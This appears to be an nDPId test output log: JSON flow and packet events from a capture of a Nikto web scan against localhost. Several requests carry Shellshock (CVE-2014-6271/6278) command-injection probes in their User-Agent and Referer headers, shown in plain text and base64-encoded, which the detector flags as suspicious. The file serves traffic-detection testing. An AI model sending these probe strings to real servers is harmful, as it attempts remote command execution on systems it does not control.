-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277354,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":1,"flow_last_seen":1576420277354,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277354,"pkt":"AAAAAAAAAAAAAAAACABFAADKIPlAAEAGGzN\/AAABfwAAAcToH5DzJBhOnEiKeoAYAED+vgAAAQEICp1m\/ZKdZv2SR0VUIC9mYXZpY29ucy9mYXZpY29uLmljbyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6ZmF2aWNvbikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277354,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277355,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":1,"flow_last_seen":1576420277355,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277355,"pkt":"AAAAAAAAAAAAAAAACABFAADBHndAAEAGHb5\/AAABfwAAAcTqH5Ag4SbPDIJk5IAYAED+tQAAAQEICp1m\/ZOdZv2TR0VUIC9mYXZpY29uLmdpZiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277355,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":1,"flow_last_seen":1576420277357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277357,"pkt":"AAAAAAAAAAAAAAAACABFAADKgAdAAEAGvCR\/AAABfwAAAcTsH5DBK7i\/eaGnm4AYAED+vgAAAQEICp1m\/ZWdZv2UR0VUIC9mYXZpY29ucy9mYXZpY29uLmdpZiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277358,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":1,"flow_last_seen":1576420277358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277358,"pkt":"AAAAAAAAAAAAAAAACABFAADByl9AAEAGcdV\/AAABfwAAAcTuH5C2YPLn77QmvYAYAED+tQAAAQEICp1m\/ZadZv2WR0VUIC9mYXZpY29uLnBuZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277358,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277359,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":1,"flow_last_seen":1576420277359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277359,"pkt":"AAAAAAAAAAAAAAAACABFAADK7Z9AAEAGTox\/AAABfwAAAcTwH5DcrNUiTS0awIAYAED+vgAAAQEICp1m\/ZedZv2XR0VUIC9mYXZpY29ucy9mYXZpY29uLnBuZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6ZmF2aWNvbikNCg0K"} 
-01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277359,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420277361,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":1,"flow_last_seen":1576420277361,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1576420277361,"pkt":"AAAAAAAAAAAAAAAACABFAAC2klBAAEAGqe9\/AAABfwAAAcTyH5D2pKrzJKNAbIAYAED+qgAAAQEICp1m\/ZmdZv2ZR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420277361,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277375,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":1,"flow_last_seen":1576420277375,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1576420277375,"pkt":"AAAAAAAAAAAAAAAACABFAAEBYRtAAEAG2tl\/AAABfwAAAcUGH5Bwr1nakn6kY4AYAED+9QAAAQEICp1m\/aedZv2nR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277375,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277378,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":1,"flow_last_seen":1576420277378,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1576420277378,"pkt":"AAAAAAAAAAAAAAAACABFAAEBjFVAAEAGr59\/AAABfwAAAcUIH5BgqrSU8g64oYAYAED+9QAAAQEICp1m\/aqdZv2qR0VUIC8gSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} 
-01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277378,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277381,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":1,"flow_last_seen":1576420277381,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277381,"pkt":"AAAAAAAAAAAAAAAACABFAAEKrtxAAEAGjQ9\/AAABfwAAAcUKH5Ddg5Yc5mMQaoAYAED+\/gAAAQEICp1m\/a2dZv2sR0VUIC9hZG1pbi5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277381,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7440000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277383,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":1,"flow_last_seen":1576420277383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":288,"pkt_l4_len":254,"thread_ts_msec":1576420277383,"pkt":"AAAAAAAAAAAAAAAACABFAAES8w1AAEAGSNZ\/AAABfwAAAcUMH5A5v8vLlyOw2IAYAED\/BgAAAQEICp1m\/a+dZv2vR0VUIC9hZG1pbmlzdHJhdG9yLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} -01173{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7440000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277383,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/administrator.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277386,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 